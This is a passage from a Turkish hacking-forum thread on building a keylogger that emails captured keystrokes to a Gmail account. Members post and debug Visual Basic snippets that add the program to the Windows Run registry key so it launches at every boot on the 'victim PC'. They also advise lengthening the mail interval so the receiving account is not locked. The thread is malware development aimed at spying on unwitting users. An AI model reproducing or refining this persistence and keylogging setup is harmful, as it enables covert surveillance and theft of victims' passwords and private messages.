Mailli KeyLogger Yapımı // ÇALIŞIYOR.KODLAR ALINTI ANLATIM BENDEN.

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

imati

Katılımcı Üye
2 Ağu 2009
412
0
İzmiR
bakın arkadaşlar şu kodları uygun şekilde doldurup kodlara eklerseniz pc her açıldığında çalışabilir ancak programın yeri değiştiğinde kod pasif olabilir..

PHP:
Dim reg As Object
        reg = CreateObject("wscript.shell")
        reg.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & ("Program ismi"), Application.StartupPath & "Programın bulunduğu yer" & ("programın ismi") & ".exe")
    End Sub

abi ben bunu denıedım bı yerinde hata veriyo kızmızı cıkıyor..

Agemon

Özel Üye
22 Ocak 2010
6,476
1
eg.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & ("Program ismi"), Application.StartupPath & "Programın bulunduğu yer" & ("programın ismi") & ".exe")
End Sub
burdan abi

kardeşim kodları uygun şekilde doldur tekrar dene bak parantez içlerinde programın adı,programın bukunduğu yer yazıyor ya onları sil kendine uygun doldur mesela progrmaın adını keylogger koydun diyelim orda ki parantez içinde yazan yere de keylogger yaz öyle dene

crazy3131

Katılımcı Üye
22 May 2010
525
0
Sevdim O Zalimi .)
PHP:
Kod:
Forma CheckBox Ekleyin.
Kodları Formun Kod Penceresine Yazın..
Private Sub Check1_Click()
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
If Check1.Value = 0 Then
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS \CUR RENTVERSION\RUN\" & App.EXEName, "" & "" & "" & ""
End If
If Check1.Value = 1 Then
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS \CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
End If
End Sub

Pc Açılınca Proğramın Çalışması İçin Böyle bir kod buldm netten :D işe yararmı aceba

Agemon

Özel Üye
22 Ocak 2010
6,476
1
PHP:
[COLOR="Lime"]Kod:
Forma CheckBox Ekleyin.
Kodları Formun Kod Penceresine Yazın..
Private Sub Check1_Click()
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
If Check1.Value = 0 Then
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS \CUR RENTVERSION\RUN\" & App.EXEName, "" & "" & "" & ""
End If
If Check1.Value = 1 Then
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS \CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
End If
End Sub[/COLOR]

Pc Açılınca Proğramın Çalışması İçin Böyle bir kod buldm netten :D işe yararmı aceba

yarayabilir ancak veri tabanı gerekiyor.

Agemon

Özel Üye
22 Ocak 2010
6,476
1
MrT-R4P kardeşimkodları Dr.Coder'a bi gönderelim ilgilenmesi için yardım istiyelim..

imati

Katılımcı Üye
2 Ağu 2009
412
0
İzmiR
PHP:
Kod:
PHP:
[COLOR="Lime"]Forma CheckBox Ekleyin.[/COLOR]
[COLOR="Lime"]Kodları Formun Kod Penceresine Yazın..[/COLOR]
[COLOR="Lime"]Private Sub Check1_Click()[/COLOR]
[COLOR="Lime"]Dim KayitDefteri As Object[/COLOR]
[COLOR="Lime"]Set KayitDefteri = CreateObject("wscript.shell")[/COLOR]
[COLOR="Lime"]If Check1.Value = 0 Then[/COLOR]
[COLOR="Lime"]KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS \CUR RENTVERSION\RUN\" & App.EXEName, "" & "" & "" & ""[/COLOR]
[COLOR="Lime"]End If[/COLOR]
[COLOR="Lime"]If Check1.Value = 1 Then[/COLOR]
[COLOR="Lime"]KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS \CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"[/COLOR]
[COLOR="Lime"]End If[/COLOR]
[COLOR="Lime"]End Sub[/COLOR]

aynısını bende bulmustum ama olmadı

Agemon

Özel Üye
22 Ocak 2010
6,476
1
arkadaşlar bakın logların süresini arttırmanız tavsiyem çünkü gmail.com hesaplarına dakikada bir gelen loglar sisteme zara veriyor mail adresiniz kitlenebiilir v.s sonra programın hiç bir önemi kalmaz eğer değiştirmek istemiyor iseniz gelen logları kontrol ettikten sonra silmeniz iyi olucaktır.unutmayın ki bu intervalla program bir nevi mail bomber gibi :D onun için interval değerlerini arttırın konu güncel ordan takip edin..

MrT-R4P

Üye
30 Ocak 2008
192
0
Arkadaşlar Crazy3131 arkadaşımın sorununu teamwiever ile çözdüm.Pazartesi gününden sonra daha çok yardımcı olurum sizlere(elimden geldiği kadar).Herkese Kolay Gelsin.Belki gene girerim pazartesine kadar ama o kadar çok ilgilenemeyebilirim.Kusuruma bakmayın.

arkadaşlar bakın logların süresini arttırmanız tavsiyem çünkü gmail.com hesaplarına dakikada bir gelen loglar sisteme zara veriyor mail adresiniz kitlenebiilir v.s sonra programın hiç bir önemi kalmaz eğer değiştirmek istemiyor iseniz gelen logları kontrol ettikten sonra silmeniz iyi olucaktır.unutmayın ki bu intervalla program bir nevi mail bomber gibi :D onun için interval değerlerini arttırın konu güncel ordan takip edin..

Size gelince söyledikleriniz doğru.Ben ekledim zaten konuya,Anlattım 30 dkda bir veya saatte bir istiyorsanız diye.İlginizden Dolayı Teşekkür ederim ;)

Agemon

Özel Üye
22 Ocak 2010
6,476
1
Tamam kardeşim ben Dr.Coder'a söyledim kurban pc de programın otomatik olrak açılmasını nasıl sağlayabiliriz diye benim kaynaklarıma da haber verdim en geç pazartesi geri dönckeler bana k.i.b daha sonra görüşürüz programı geliştiririz.

imati

Katılımcı Üye
2 Ağu 2009
412
0
İzmiR

abi bana dun bi windows live messenger msj geldi maillerinizi tek adrese gonderilsin diye bende inceledim gmail msjlarım loglar msn e-postasına gelıyor...

Agemon

Özel Üye
22 Ocak 2010
6,476
1
Arkadaşlar Crazy3131 arkadaşımın sorununu teamwiever ile çözdüm.Pazartesi gününden sonra daha çok yardımcı olurum sizlere(elimden geldiği kadar).Herkese Kolay Gelsin.Belki gene girerim pazartesine kadar ama o kadar çok ilgilenemeyebilirim.Kusuruma bakmayın.

Size gelince söyledikleriniz doğru.Ben ekledim zaten konuya,Anlattım 30 dkda bir veya saatte bir istiyorsanız diye.İlginizden Dolayı Teşekkür ederim ;)

Rica ederim kardeşim programı el birliğiyle geliştiriyoruz yardımcı olduysam ne mutlu :)

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.